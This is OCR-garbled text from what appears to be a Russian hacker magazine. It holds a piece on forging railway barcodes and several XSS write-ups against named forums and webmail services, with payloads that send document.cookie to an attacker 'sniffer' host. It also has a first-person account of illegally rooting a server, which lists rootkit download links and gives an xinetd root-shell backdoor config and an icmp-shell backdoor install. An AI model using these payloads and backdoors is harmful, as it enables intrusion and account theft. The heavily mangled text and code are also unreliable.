Потом спецы в РЖД просекли фишку и поменяли кодирование, добавив 
еще один штрихкод. Насколько я знаю, это не сильно изменило ситуа- 
цию, и энтузиасты довольно быстро раздраконили и этот код. 

В Интернете даже есть целый сайт, посвященный этой теме, — 
Мір://ЬагсосІе5.пагосІ.ги. Сайт уже давно не обновлялся, но все еще жи- 
вет гостевой книгой — сейчас там можно встретить весьма актуаль- 
ные сообщения. Если для тебя актуальна тема бесплатной езды на 
электричках, то советую обратиться к этому сайту, а также к статье, 
которую ты найдешь на нашем диске :). 

[заключение] Изучение технологий штрихкодирования может ока- 
заться весьма интересным и, что самое главное, полезным занятием. 
Ведь сегодня штриховое кодирование применяется во множестве раз- 
личных систем: системах оптовой и розничной торговли, в охранных 
системах и системах аутентификации, в системах автоматизированного 
ввода и учета документов, в производственных системах контроля и т.д. 
Подделав штрихкод, злоумышленник может добиться каких-то 
собственных целей в обход устанавливаемых правил. Обслуживающий 
персонал склонен чересчур доверять технологии штрихкодирования, 
полагая, что подделка штрихкода, — весьма сложная задача. Это не 
так. Даже штрихкоды, созданные по закрытым стандартам, поддаются 
расшифровке путем их анализа © 
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Собери Уголок Добра по с хеке ■ 

Водрузи готовый Уголок Дойре на вирном месте. 

Торжественно пообещай творить добро по мере сил. 

I Повторяй «Овип Покос, Ввнп Покос, ^ 

Овип Покос! - до бесконечности. ѵ 

И да пребудет о то бой Сзнп Покой 
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[зоЫагп.іѵ] Ты, наверное, знаешь о том, что канал НЕІЧ-ТѴ после 
смены владельца начал активно осваивать перспективный рынок реа- 
лити-шоу. Недавно вот запустили проект с названием «Остров Искуше- 
ний» и сделали для проекта сайт — тѵѵѵ.зоЫагп.іѵ. Как и следовало бы 
ожидать, куча разнообразных девочек и мальчиков с упоением смотрят 
за чужой заэкранной жизнью и сценарийными отношениями, а сайт 
этого проекта кроет в себе опасный баг, с помощью которого можно 
здорово повеселиться. 

Вернее, не сайт, а форум. 

Если зайти на главную страницу этого раздела, то ты увидишь длинную 
ботву о копирайтах, а еще ниже — строку «Этот форум работает на 
скрипте Іпіеііесі Воагб 2.13» и ссылку на сайт форума — 
шѵуѵ.іпіЬоагсі.ги. Оказалось, что форум бесплатный и доступен кому 
угодно для скачивания. То, что доктор прописал. За десять минут был 
найден баг, позволяющий выполнять произвольный код на стороне 
клиента. В файле харПрі.рПр осуществлялась фильтрация всех пере- 
менных. Вот кусок бажного кода: 

Іипсііоп &де1ѵаг($пате) { 
і! (5ігроз($пате,"_іех1")===ІаІ5е) { 

\1 (і5$еІ($_6ЕТ[$пате])) $1тр = 5Ігір5Іа$[іез($_6ЕТ[$пате]); 
еІзеіТ (і$$еІ($_Р03Т[$пате])) $1тр= 5Ігір5Іа5Ііез($_Р03Т[$пате]); 

} 

еізе { 

і! (іззеІ($_еЕТ[$пате])) $1тр = 

ІіІтІ5ресіаІс[іаг5(5Ігір5Іа5[іе5($_СІЕТ[$пате])); 

еІзеіТ (і5зеІ($_Р03Т[$пате])) $Ітр= Ііітізресіаісііагзфгірзіазіі- 

ез($_Р03Т[$пате])); 

} 

Как видно из кода, все переменные, имеющие в названии «_1ех1», 
пропускаются фильтром. А вот это интересно. Посидев за разборкой 
кода еще пару минут, нашел, что переменная, обозначающая тему 
в приветном сообщении, имеет название рт_1ехТ 
Отлично, теперь мы можем выполнить любой яваскрипт, единствен- 
ное ограничение — длина темы в 80 символов. Но эти границы лег- 
ко расширить, заюзав конструкцию вроде <зсгірІ згс= ,м, >. Так что нич- 
то не мешает написать админу или кровному врагу слезное сообще- 
ние, которое уведет у бедолаги сессию, выведет пять сотен окошек 
или зальет ему трояна^шмшши ватный баг. Все зависит от целей :). 
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[ЫеѵѵМаіІ.ги] Четверть миллиона человек пользуются почтовым 
сервисом ІМеѵѵМаіІ.ги, четверть миллиона пользователей и четверть 
миллионов сайтов вновь под угрозой. Программисты, разрабатыва- 
ющие ѵѵеЬ-интерфейс этого сервиса, не отличаются сообразитель- 
ностью: примерно два раза в год мы пишем о багах в этом интерфей- 
се :). Пользуясь случаем, хочется передать им привет и поздравить 
с Новым годом. 

Откровенно говоря, об этих багах известно уже давным-давно. Где- 
то год назад, наверное, мы уже писали об этом. Суть проблемы зак- 
лючается в том, что любой человек, желающий получить доступ к оп- 
ределенному аккаунту, может послать на соответствующее мыло 
ИІтІ-письмо следующего содержания: 

<ітд згс='Шр://адрес.снифера.ру/картин- 
ка.]рд?"+сіоситепІсоокіе;> 

Так ты прекрасно понимаешь, это покажет пользователю картинку, 
а его кукисы передаст в нежные руки злобного хакера. Стоит ли го- 
ворить, что такое сообщение можно зашифровать под обычный спам 
или, наоборот, разместить там вполне корректное содержание. 

Все это было известно уже давным-давно. В чем же подгон? :) Фишка 
заключается в том, что после статьи в нашем журнале админы «закры- 
ли баг»: они привязали сессию к ІР. Но по неизвестной причине они сде- 
лали это только в головном скрипте, с которого начинается работа с 
системой. Сценарий, позволяющий работать с файлами, эти ребята ре- 
шили не менять. Таким образом, обратившись к адресу вроде 
шш4.підМтаіІ.ги/изегз/ту^Иез.сІМтІ?зеззіоп_ісІ=\/ѴкО04аРСі49ітдОхШѴ 
МСХс8оЫп53ХХОк, становится возможным управлять сайтом пользова- 
теля, и привязка к ІР в головном скрипте для этого не помеха! Причем 
украденная сессия живет очень долго. Я сам на практике использовал 
сеанс, который должен был быть завершен уже несколько часов назад. 




ІѴпаі & цр! 

ІШёІіІ 

Щр ШІг 

ЭТО ВСЕ НЕ ПРОСТО ТАК. ПРИЯТЕЛЬ 







[таіі.гар.ги] Крутые пацаны и девчонки, которые слушают «чиста 
модный рэпак» теперь не спят спокойно: их почта под угрозой. 
Ничего особенного в этом баге нет, он как две капли воды похож на 



[зеноновский ги.ш] Ты, конечно же, знаешь о такой почтовой 
службе, как Нити. Как тебе известно, этот сервис поддерживает про- 
вайдер 2епоп, который некогда славился стабильностью и качеством 
своей работы. Однако ошибки есть везде, и проект зенона — не иск- 
лючение. Сейчас я расскажу тебе, как я нашел баг на этом почтовике. 
Зарегистрировав на сервере левый ящик, я принялся экспериментиро- 
вать. Зарегил себе логин и начал насиловать систему. Первым делом я 
решил послать на зеноновскую почту письмо с НітІ-аттачем и вот что из 
этого вышло. От начального содержимого «<зсгірЬаІегІ(/Хакер/)</зсгірЬ» 
осталась только совсем уж безобидная строка «аІегІ(/ХЗЗ/)</зсгірк>». 
Однако когда я попробовал отправить НІтІ-письмо с несложным содер- 
жимым <ітд згс='Мр://адрес.картинки.ру/картинка.)рд">, то воскликнул 
от радости — картинка пришла! Давным-давно известно, что браузер ІЕ 
можно заставить выполнить некоторый код при отображении картинки 
или любого другого ПІтІ-элемента. Для этого достаточно указать специ- 
альный параметр в стиле этого элемента: <ітд згс=ИИр://адрес. картин- 
ки. ру/картин ка.ірд 5ІуІе=Ьаскдгоипб:игІ(]аѵазсгірІ:аІег1(/ХЗЗ/))>. Теперь 
мне не составило труда немного изменить код, чтобы получить доступ к 
юзерским кукисам: 



все предыдущие. Вопреки ожиданиям примитивный код <ітд 
з^с= ,, ^аѵазс^ір^:аIе^^(боситеп^соокіе)> I, не прокатил, программа кое- 
что фильтровала. Однако выход был найден быстро. Чтобы пока- 
зать пользователю его кукисы, требуется отправить на целевой 
е-таіі НІтІ-письмо с таким вот содержанием: 

<ітд 5гс='Шр://адрес. картинки. ру/картинка.ірд" 5ІуІе=Ьаск- 
дгоипсі:игІ(іаѵа5СгірІ:аІегІ(/ХЗЗ/))> 

Чтобы увести его кукисы подойдет следующий код: 

<ітд 5гс='іаѵазсгірТітд = пеѵѵ Ітаде(); ітд.згс = "ІШр://Снифер.ш 
/5.^рд?"+сIоситеп^соокіе , ; /> 

Или же можно воспользоваться предыдущим примером: 

<ітд згс='Шр://адрес. картинки. ру/картинка.ірд" 5ІуІе=Ьаск- 
дгоипсІ:игІ(іаѵазсгірІ: сІооитеп1.ітадез[1].згс="ІіНр://снифер.ги 
/з.ірд?"+сІоситепІсоокіе)> 



<ітд згс='Шр://адрес. картинки. ру/картинка.ірд" 5ІуІе=Ьаск- 
дгоипсІ:игІ(іаѵазсгірІ: сІоситеп1:.ітадез[1 ].згс="1пі1:р://снифер.ги 
/з.ірд?"+сІоситепі.соокіе)> 

Как только человек прочитает это письмо, ты получишь доступ к его куки- 
сам и без проблем сможешь получить доступ к переписке своей жертвы. 



Еще необходимо добавить, что, получив доступ к сессии, ты можешь 
легко получить исходный пароль: в настройках ты можешь элементар- 
но подсмотреть ответ на контрольный вопрос! Остается только позави- 
довать наивности программистов, защитивших смену контрольного 
вопроса и установку нового пароля старым ключом, открывшим на обоз- 
рение ответ на секретный вопрос (фактически тот же самый пароль) © 
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Охота на хакера 

Проникновение в захваченную систему 
и устранение хакера-конкурента 



В ИНТЕРНЕТЕ ПОЛНЫМ-ПОЛНО РАЗНООБРАЗНЫХ СЕРВЕРОВ, 
КОТОРЫЕ ДЕНЬ И НОЧЬ РАБОТАЮТ НА БЛАГО ПОЛЬЗОВАТЕ- 
ЛЕЙ СЕТИ. КАЖДАЯ ТАКАЯ МАШИНА НАХОДИТСЯ НА ПОПЕЧЕ- 
НИИ У СЕТЕВОГО ГУРУ — АДМИНИСТРАТОРА, КОТОРЫЙ СЛЕ- 
ДИТ, ЧТОБЫ ѴѴЕВ-СЕРВЕР РАБОТАЛ СТАБИЛЬНО, МАИ-ДЕМОН 
ФИЛЬТРОВАЛ СПАМ, МѴЗОІ_ ВОВРЕМЯ ОБРАБАТЫВАЛА КЛИЕН- 
ТСКИЕ ЗАПРОСЫ, А РТРЭ НЕ ПАДАЛ ПОД НАПОРОМ ХАКЕРС- 
КИХ ЭКСПЛОЙТОВ. ПРОБЛЕМА В ТОМ, ЧТО ВСЕ СЛЕДЯТ ПО- 
РАЗНОМУ. НЕДАВНО ВОТ Я НАТКНУЛСЯ НА ТАЧКУ, КОТОРУЮ 
УЖЕ КТО-ТО ВЗЛОМАЛ ДО МЕНЯ :(. ПРИШЛОСЬ ОТСТАИВАТЬ 
СОБСТВЕННЫЕ ИНТЕРЕСЫ И «ВЫПЕРЕТЬ» НЕРАДИВОГО ХАКЕ- 
РА ИЗ ЦЕННОЙ МАШИНЫ I Александр Любимов ака ЗазЫкз (геаІ_ззІпх@таіІ.ги) 



[незаконное вторжение] Эта история началась с того, что я узнал рутовый пасс 
на одной машине. Как ни странно, но в /еіс/кіозіз была прописана еще одна тачка (ес- 
тественно, из этой же сети), и я поспешил вломиться туда рутом по ззП. Конечно же, 
ненастроенный ззіісі впустил меня с нулевым уидом. Системка, судя по всему, была 
ѵѵеЬ-сервером — на винте хранились множество юзерских страничек и даже сайты ка- 
ких-то солидных, судя по дизайну, французских предприятий. Машина, заточенная под 
ѵѵеЬ-сервер, была скромно наделена 3 Ггц процессором, 120 Гб винтом и уймой опе- 
ративной памяти. Короче говоря, тачка попалась нехилая. Имея рутовый доступ, прот- 
роянить сервак и сделать свое пребывание на машине не таким заметным не состав- 
ляло особого труда. Предварительно проверив, что в Багдаде все спокойно (ѵѵііо, Іазі 
-10), я приступил к активным действиям. В первую очередь, нужно было слить подхо- 
дящий гооікіі. В паблике сейчас их довольно много, но особой популярностью пользу- 
ются именно эти комплекты: 

* 5ііѵ4 (ІіНр://5ѵіпикІеоп.и5ЛооІ5/5Ііѵ4.іаг.д2) 

* зискіі (Пир://раскеІ5ІогтзесигіІу.пІ/ІІМІХ/репеІгаІіоп/гооІкіІ5/5к-1 .За.іаг.д і) 

* І_КМ асіоге (ІіПр://рго-Ііаск.ги/сІоѵ\/пІоасІ/гооікіі5/асІоге-0.42.1д2) 

Хотя, если говорить откровенно, то можно было использовать и всякие ІихкіГы, Кпагк'и 
и так далее — это дело исключительно личное. Теперь осталось самое сложное — 
перейти в /ітр (или /ѵаг/ітр) и залить туда вредоносный архив. Едва сделав Із -Іа 
/ѵаг/ітр, я немного удивился: в папке лежали пара бинарников и несколько сорцов. И 
тут до меня дошло, что это обычные сплоиты для старых ядер 2.4.Х. Тревожная мысль 
о том, что в систему проник какой-то другой хакер, уже нашла подтверждение. Тем бо- 
лее что файлы принадлежали поЬосІу (стандартный юзер, под которым арасПе загру- 
жается) и, судя по дате, они были созданы минут сорок назад. Совсем не паленой ока- 
залась папка .шузр/, в которой обнаружился заразовский прокси и скрипт для масс де- 
фейсинга на РНР. До сих пор, правда, не понимаю, зачем заливать дефейсер, если со- 
бираешься юзать тачку как ргоху :). Терять доступ к этой машине из-за того, что какой- 
то левый чел решил просто от нечего делать поиметь сотню-другую сайтов, мне не 
особо хотелось. Поэтому решено было «выпереть» наглого оппонента :). К сожалению, 
я не сразу обратил внимание (ипате -г), что ядрышко довольно древнее и не патчен- 
ное, а поэтому хакеру, скорее всего, уже удалось стать суперпользователем. 
Забэкдорить тачку и оставить для себя доступ хакер, наверное, уже успел, и в этот раз 
мне предстояло вытеснить названного гостя с ѵѵеЬ-сервера и не дать испоганить ему ту- 
еву хучу сайтов и загробить доступ к такому перспективному в плане ресурсов компу. 



ВАСКОООВ ЧЕРЕЗ ХІМЕТО 

К сожалению, как и все в этом мире, 
хіпеісі хакеры могут использовать в своих 
грязных целях, чтобы без проблем кон- 
нектиться на машину. Это выглядит сле- 
дующим образом. Взломщик выбирает 
название любой неиспользуемой службы 
из /еіс/зегѵісез. В этом файле установле- 
ны соответствия между именами и номе- 
рами портов для сервисов. Далее, в 
/еіс/хіпеісі.сі создается файл с именем 
выбранной службы. 

В качестве такого сервиса можно выб- 
рать ігс, висящий на 1 94Лср порту, — 
не путай его с ігссі. В /еіс/хіпеісі.сі/ігс вно- 
сятся следующие записи: 





[волк в овечьем зкіп'е] Сложившаяся ситуация выбора мне не оставляла: на не- 
которое время мне придется сменить амплуа и «поработать» в качестве админа на 
благо безопасности :). Итак, начинаем соображать. Хакер, поломавший систему, мо- 
жет пойти разными путями, и, чтобы иметь к ней постоянный доступ, не обязательно 
устанавливать гооікіі, ведь можно просто обойтись приемами, которые практикова- 
лись годами — главное, чтобы была фантазия. Именно поэтому я решил оставить по- 
иск руткита как самый крайний вариант. Приступим к изучению скомпрометирован- 
ной системы. Многие начинающие хакеры оставляют в системе обычный бэкдор 
(ЬіпсІзІіеІІ, гОпіп, Ьіпсіиу) и запускают его засуиженным из-под рута. Как вариант соз- 
дается простой С-файл, в котором выполняется зеІиісІ(О) и зеІдісІ(О) и запускается ко- 
мандный интерпретатор — зузІет(7Ьіп/5Іп"). На такой бинарник ставится сіітосі +з, 
получается, чтобы такое негодяйство найти, надо выполнить ТіпсІ / 4уре I -регт -04000 
-Із и проанализировать вывод на наличие странных или левых утилит (вроде 
7зЬіп/гооІ_те" :)). Проделав все вышеописанное, я бегло убедился, что все в норме. 
А не мог ли хакер оставить в системе троян, который светит наружу порт? Такой Ьаск- 
боог можно с легкостью обнаружить с помощью портсканера или пеізіаі'а: 

# пеізіаі -ап Ідгер ЫЗТЕИ 




На нашем диске ты найдешь 
полные версии программ, 
описанных в этой статье. 




Небольшой архив руткитов 
с кратким описанием 
можно найти тут: 
ІіІІрУ/ботІоаб. 
рго-Ііаск.ги/5_гооікіі5.ІіітІ 




сйкѵооікіі: 

\л/\л/\л/.с!ікгооікН.огд 

гкйипіег: 

шѵѵѵѵ.гооікіі.пі 






СКРЫТАЯ УГРОЗА 

ІСМР-5НЕЫ- — рульная утилита, написанная Питером Киелту- 
ка {Шр://істрзІпеІІ.зоигсеІогде.пеі). Она, по сути, является до- 
вольно оригинальным бэкдором. Принцип работы істр-зГіеІГа 
состоит в том, что запросы с командами, которые посылает 
хакер со своей машины, инкапсулируются в ІСМР-пакеты и 
передаются удаленной целевой машине. Вообще, программа 
состоит из двух частей: клиента и сервера. Как ты, наверное, 
догадался, сервер запускается на похаканном хосте, а клиен- 
тская часть — на машине взломщика. Следует понимать, что 
обе части программы обращаются к так называем сырым со- 
кетам (гаѵѵ зоскеіз), а поэтому для запуска нужны абсолютные 
привилегии. Теперь, с твоего позволения, я расскажу об этой 
самой инкапсуляции. 

При запуске ізГісі (серверной части), ему нужно передать пара- 
метр -і (идентификатор сессии), это делается для того, чтобы 



можно было осуществлять несколько подключений к машине. 
Далее, с помощью параметра -I, можно указать тип пакета 
ІСМР, в которые будут инкапсулированы команды клиентской 
части приложения. Например, 8 эквивалентно эхо-запросу, 
уведомление о недостижимости прячется за тройкой. 

По умолчанию используется эхо-ответ (0). Таким образом, 
ты должен запускать клиент (ізГі) точно с такими же парамет- 
рами, как и серверную часть. Теперь все твои команды будут 
инкапсулированы в ІСМР-пакеты и доставлены на машину, 
где ізГісі будет обрабатывать их и создавать рабочий пайп 
к шеллу (/Ьіп/зіі), затем выполнять команду и отправлять 
данные из пайпа обратно на твою машину. Причем стоит от- 
метить, что интерактивные программы могут некорректно 
работать с істр-зІіеІГом. Софтина мне очень понравилась — 
она незамедлительно отправилась в мой арсенал. Кто знает, 
может, ей посчастливится попасть и в твой? :) 
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НЕ НАШЕЛ 




ЕІМТЕВ 



ИЩЕМ ЛЕВЫЕ БИНАРНИКИ С БИТОМ +3 



МЕТЗТАТ’ОМ ИЩЕМ ПРИМИТИВНЫЕ БЭКДОРЫ 



НАШЕЛ 



ИЗУЧАЕМ КОНФИГИ СЕРВИСОВ, 
ПУСКАЮЩИХСЯ ЧЕРЕЗ ХІЫЕй 



КАЧАЕМ РЮОТКГГНШТЕВ И ИЩЕМ РУТКИТЫ 



НАШЕЛ 



ПЛЯШЕМ С БУБНОМ 



НАШЕЛ 



ЕХІТ 



■ * *■ 1 ' /-ч * 

*• "*н 



Ничего лишнего, как казалось, здесь тоже 
не было — только стандартные службы. 

А вот в выводе рз -аих среди прочего мусо- 
ра я увидел процесс демона хіпеіб (я не 
часто видел, чтобы его применяли). Ты, на- 
верное, про него слышал и знаешь, что 
хіпеіб (Ехіепсіесі Іпіегпеі Оаетоп) — улуч- 
шенная версия суперсервера іпеісі. Его за- 
дача заключается в прослушивании пор- 
тов для служб, указанных в конфиге. Вмес- 
то того чтобы запускать кучу всяких Іеіпеісі 
и ззГісі, мы просто активизируем хіпеіб и он 
сам определит, на какую службу к нам хо- 
тят подцепиться и что запускать — Ир или 
Іеіпеі сеанс. Все службы, предоставляе- 
мые хіпеіб, валяются в папке /еіс/хіпеісі.сі. 
Например, в /еіс/хіпеісі.сі/іір лежит конфиг, 
описывающий параметры запуска ИрсІ. 

Я принялся тщательно изучать конфиги 
сервисов, которые предоставлял супер- 
сервер. Придраться, мягко говоря, было 
не к чему, да и даты на файлах стояли 
месячной давности (хотя их тоже можно 
было сменить командой ІоисГі). Другими 
словами, маловероятно, что нарушитель 
использовал для удаленного доступа 
именно хіпеісі. Значит, немного изменим 
направление поиска. 



ЗАТРОЯНЕННЫИ ТРОЯН 

Ни для кого не секрет, что руткиты зііѵ обоих версий 4 и 5 
очень популярны, и юзает их прилично народу. Поэтому 
про то, что в рутките присутствует код, который отсылает 
секретные данные из системы, сейчас знают почти все. 
Давай рассмотрим повнимательнее зИеІІ скрипт этого рут- 
кита, который отвечает за его установку в систему — 
зеіир. Открыв его любым текстовым редактором, ты через 
несколько дней изучения (или если введешь ТіпсІ -> таіі) 
обязательно найдешь такую строчку: 

есбо "$1:$2:Фо$1пате -Г:$МУ1РА00Р" I таіі $тб5$ит 



Вот как раз ему и уплывает инфа о системе (в коде еще можно 
встретить аналогичную отсылку, но только уже для ипате -а и іб). 
Но интересно даже не это. Любопытно то, что, когда этот руткит 
передается из рук в руки, адресок, на который высылается пароль 
на доступ к машине, меняется. Каждый норовит вписать в зеіир 
свое мыло, чтобы его каждый день спамили доступом к новым по- 
хаканным системам :). Чьи я только мыла там не видел! И к чему 
я это все сказал? А то, что нужно стараться изучить хотя бы по ди- 
агонали все незнакомое, что попало к тебе в руки. К сожалению, 
обмануть может кто угодно — даже чувак, с которым давно зна- 
ком. Поэтому, дружище, как говориться, доверяй, но проверяй! :) 



Не находишь в ней ничего подозрительного? Переменные 
$1 и $2 — это пароль и порт, которые ты указал при уста- 
новке кита. Откуда берется переменная $МУІРАООВ и что 
она означает, я думаю, объяснять не нужно. А вот с 
Зтсібзипп все намного интереснее. Вообще-то, если ис- 
кать в коде чему равна $тс15зит, то натыкаешься лишь 
на процедуры манипуляций с /изг/Ып/тс155ит (утилитка 
для работы с чексуммой). Но в конце концов переменной 
присваивается значение мыла нехорошего дядьки: 
тсІ55ипп=І1_пих@уаІіоо.сот 



ОХОТНИК С ГАНОМ 

ВооМІпипІег — действительно крутая тулза с нехилым набо- 
ром возможностей, и это при том, что написана она пол- 
ностью на скриптовом языке! Как сказано на сайте разработ- 
чика (тт.гооМ.пІ/аІэоиі), софтина совместима со всеми 
ІІІ\ІІХ-Ііке операционками и зависимости от установленного 
ПО у нее отсутствуют. Итак, как ты понял, основная задача 
гкГіипіег'а заключается в проверке твоей системы на наличие 
разного рода китов и бэкдоров. Прога проверяет права на би- 
нарниках, ищет подозрительные модули (І_КМ) и сравнивает 
чексуммы системных приложений. Она успешно обнаружива- 
ет Кпагк, Зискй, ЗНѴ4(5), РгееВЗй ПооМ и многие другие 
вредоносные программы. Как заявляет автор, руткитхантер с 
99.9% вероятностью может определить, заражена ли маши- 
на. Очень полезная, на мой взгляд, утилита, которая должна 
быть на заметке у каждого администратора. Есть еще и ана- 
логичного рода программа — сІікгооМ, который по принципу 
работы очень схож на хантер. Рекомендую потестить на сво- 
ей площадке — вдруг к тебе незаметно заполз какой-нибудь 
хэккер и качает тоннами варез с твоего сервера. 



ПРИМЕР ХАКЕРСКОГО КОНФИГА 

зегѵісе ігс 

# после ключевого слова зегѵісе идет название службы 
{ 

рогі = ігс 

# порт какой службы использовать — смотри в /еіс/зегѵісез 
зоскеУуре = зігеат 

# тип соединяющего сокета 
ѵѵаіі = по 

# ждем ? -нет ! 
изег = гооі 

# пользователь владелец сервера 
зегѵег = /и з г/І о са І/Ь п і/Ь аз И 

# имя файла, который выступает в роли сервера, — универсальный 
вариант УЫп/зіі" 

зегѵег_агдз = -і 

# аргументы к бинарнику — у нас "/Ьіп/зіі -і" 
сІізаЫе = по 



Вот так вот взломщики проникают в систему при помощи 
хіпеісі. Таким же образом можно сделать бэкдор под учетной 
записью обычного пользователя. Для этого нужно написать то 
же самое в какой-нибудь файл, спрятать его подальше, а за- 
тем под юзером выполнить: 

$ 'ѵѵМсіі хіпеІсГ Л /раШЛоЛііе/ЬасксІоог.сопІ 

После этого бэкдор будет запущен. Аргумент Л указывает, 
какой конфигурационный файл использовать при запуске. 
Разве что следует помнить — обычному юзеру порт ниже 
1024 не светит, да он и не нужен. 






Й ЗЙВ ійэЯ 4и*«#й Рісигн# ШярГ ^ Шркй Ида иФ л^ч^ з 4 ШгаЯ [гім**т^| п Гч« ^ ^ ічйр й*чт пи*і 




ьпіегпаііопаі 

ріс^иге; 



г$*шхыяііоъ&Ѵс*№ йсшідоюші !№і гзоэоэ* е-гі ' : -.■айіШш 
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кй = за: 

ке 
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исследуем творение вШиВых хакеров - 
отсутствие палева налицо :) 



трояним суперсервер 



[тотальная проверка] Уже через час мне 
окончательно надоело ковыряться в системных 
файлах, выискивать какие-то подозрительные 
бинарники. Хотя в запасе была еще дюжина до- 
гадок, я почему-то пришел к выводу, что в сис- 
теме был установлен именно руткит. Даже обла- 
дая навыками профессионального следователя, 
найти и вычислить руткит будет не очень легко :). 
Вот почему на свет родился гооІкШіипІег. Я уже 
когда-то читал про него и знал, что в борьбе с 
червями, троянами и прочей заразой в ІІЫІХ эта 
утилита дает администратору ощутимую по- 
мощь. С официального сайта я поспешил стя- 
нуть архив ( Мір.Ѵ/сІоѵѵпІоасІз.гооікіі.пІ/гккіипіег - 
1.2.7.іаг.дг) и установить программу. Хорошо, 
что весь процесс установки ограничился запус- 
ком инсталляционного скрипта в папке с 
гкііипіег'ом. Чтобы получить подробный отчет 
по всей системе, запускаем так: 




в логове взломщика 



# гкііипіег -с -сгеаіеіодіііе 
Китхантер, не моргнув и глазом, за- 
пустился, выдавая подробное описа- 
ние о текущем предмете исследова- 
ния. Сначала он проверил чексумму 
на бинарниках, изучил список моду- 
лей и перешел к проверке на призна- 
ки отдельных руткитов. Неожиданно 
прога вывела ѵѵагпіпд, мол, обнаруже- 
но присутствие 5НѴ4 и ЗНѴ5 и для бо- 
лее детального изучения мне следует 
обратиться к лог-файлу: 

# Іезз /ѵаг/іод/гкііипіег.іод 

В лог-файле ключевым моментом 
была следующая запись: 

[05:00:52] *** ЗѣаП зсап ЗНѴ4 *** 
[05:00:52] — Рііе /ІіЬ/ІШрзІ .50... 
ѴѴАВІМІІМ6! Ехізіз. 

[05:01:48] *** Зіагі зсап 5НѴ5 *** 
[05:01:48] — Рііе /еѣс/зИ.сопІ... 
ѴѴАВІМІІМ6! Ехізіз. 

[05:01:48] — Рііе /беѵ/згсЮ... ѴѴАВЫ- 
ІІ\І6! Ехізіз. 

[05:01:48] — йігесіогу /изг/МЬ/МЬзИ... 
ѴѴАВІМІІМ6! Ехізіз. 



Именно она разоблачала комплект, которым 
хакер заразил систему: у меня теперь есть инфа 
о домашней папке хакера (/изг/ІіЬ/ИЬзІі) и листинг 
некоторых файлов, принадлежащих к гооМ’у- Те- 
перь настал момент для решительных действий. 
События могли развиваться несколькими путями. 
Например, можно было собрать на хакера комп- 
ромат. Делается все очень просто, только для это- 
го нам нужно знать порт, на котором весит руткит. 
Качаем с сайта РЗТ (ШрУ/гзІ.ѵоісІ.ги/сІошІоасІ/ 
рогіскіеск.іхі) скрипт РогЮПескег на РегІ и запуска- 
ем его, указывая некоторый диапазон. Если отб- 
росить все системные сервисы, то по идее на ма- 
шине торчать будет только порт руткита, и поэто- 
му портчекер с легкостью его обнаружит (конечно, 
можно то же самое проделать с помощью локаль- 
ного сканирования портов, но это в несколько раз 
дольше). Каким образом рогісііеск может видеть 
даже то, что не показывает пеізіаі? Все очень 
просто: когда ты при запуске этой утилиты указы- 
ваешь диапазон, то выполняется цикл, в котором с 
помощью ІО::ЗоскеІ создается сокет на каждом из 
портов. Понятное дело, что если порт уже забит 
каким-то приложением (веб-сервер, фтп, бэкдор), 
то сокет создаться не может. Именно это и служит 
поводом считать, что порт уже открыт и использу- 
ется. Чешем репу дальше — порт мы знаем, а зна- 
чит, самое время поставить какой-нибудь крутой 
снифер. Тут выбор просто огромен, ознакомиться 
с ним можно по адресу Шр://раскеІзІогт- 
зесигііу.пІ/зпіНегз. Наснифанный трафик 
будет довольно нехилым подспорьем 
в деле против хацкера :). 



[разоблачение хакера] Итак, маши- 
на была заражена руткитом ЗНѴ5. 
Домашний каталог хакера находился в 
/изг/ИЬ/ИЬзкі. В принципе, ничего особен- 
ного, но в нем есть один замечательный 
файлик — .Ьазкігс. Именно он мне и по- 
может. В школе на уроках истории тебе, 
наверное, рассказывали, что при запус- 
ке интерпретатора вся гадость, написан- 
ная в этом сценарии, обрабатывается и 
выполняется. Поскольку я обладал руто- 
выми правами, то мог свободно записы- 
вать в этот файл все, что хотел. Для на- 
чала я решил узнать ІР-адрес наглеца- 
взломщика и выслать себе его на мыло: 



# саі ».ЬазИгс 
таіІ="5а5Ііік5@ІЬі.доѵ" 
іп!о='зеІ Ідгер 55Н_СІ_ІЕІ\ГГ 
'есііо $іпТоІтаіІ $таіГ 

Если ты хорошо знаешь зііеіі-программирова- 
ние и не обделен воображалкой, то можешь 
сделать довольно много интересного. Так вот, я 
вставил кусок кода, который мне на мыло отсы- 
лает ІР-адрес хакера (можно будет забрать ло- 
ги с компа и посмеяться над хаксором-лузе- 
ром). Затем я задумался, а не нельзя ли сде- 
лать так, чтобы сразу после входа в систему на- 
рушителя дисконнектило. То есть, чтобы терми- 
нал убивался по девятому сигналу. Порывшись 
в папках я нашел шелл-скрипт, который когда- 
то написал: 

Тог рісі іп р$ Ідгер Ьа$Іі Іаѵѵк '{ ргіпТ $1 }' ' 

СІО 

есііо "$рісі" 
кіІІ -9 $рісГ 
сіопе 

Вроде бы все, теперь можно быть спокойным, что 
нарушитель не натворит дел в системе и не поде- 
фейсит сайты, выдав наше присутствие на маши- 
не. Правда, осталось еще одно серьезное неза- 
конченное дело. Я, как ты понял, самым непалев- 
ным образом, был залогинен под рутом по ззИ. 
Эту ситуацию нужно было в корне исправлять, и 
я решил тоже забэкдорить тачку, но уже ни каки- 
ми-то там руткитами, а весьма оригинальным об- 
разом — с помощью істр-зііеіі (читай про эту уди- 
вительную тулзу во врезке). Качнуть можно по 
адресу Шр://ре1егІюз1.сІІ.зоигсе{огде.пеІ/ зоигсе- 
і огде/істрзЬеІІ/ізГі-ѵОЯ.Іаг.дг . Распаковав архив, я 
сделал таке Ііпих и получил два бинарника: 
ізіісі(демон) и ізИ(клиент). Сервак я закинул в /Ып, 
изменив переменную РАТН на текущий каталог и 
переименовав в тузд/с/, запустил с дефолтными 
параметрами. Вообще-то, делать так нежела- 
тельно и лучше всего было бы использовать этот 
бэкдор вместе с абоге, ведь тогда увеличиваются 
шансы быть не обнаруженным злобным админи- 
стратором сети. Чтобы безболезненно получать 
доступ к этой машине, я собрал клиент істр-зііеі- 
Га у себя на РгееВЗО. Ну, вроде бы и все — бэк- 
дор работает как надо, а значит, я получил в свое 
распоряжение отличную площадку для дальней- 
шего деструктива :) © 




трояним суперсервер 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20І\ІЕ РЕВВІІМ НЬЮСЫ 



Потрогай нежно 

Обзор утилит для грамотного гетоіе Ііпдегргіпі'а 



ЛЮБОМУ БОЮ ВСЕГДА ПРЕДШЕ- 
СТВУЕТ РАЗВЕДКА. И НЕ МУДРЕ- 
НО, ВЕДЬ ЧЕМ БОЛЬШЕ ТЫ ЗНА- 
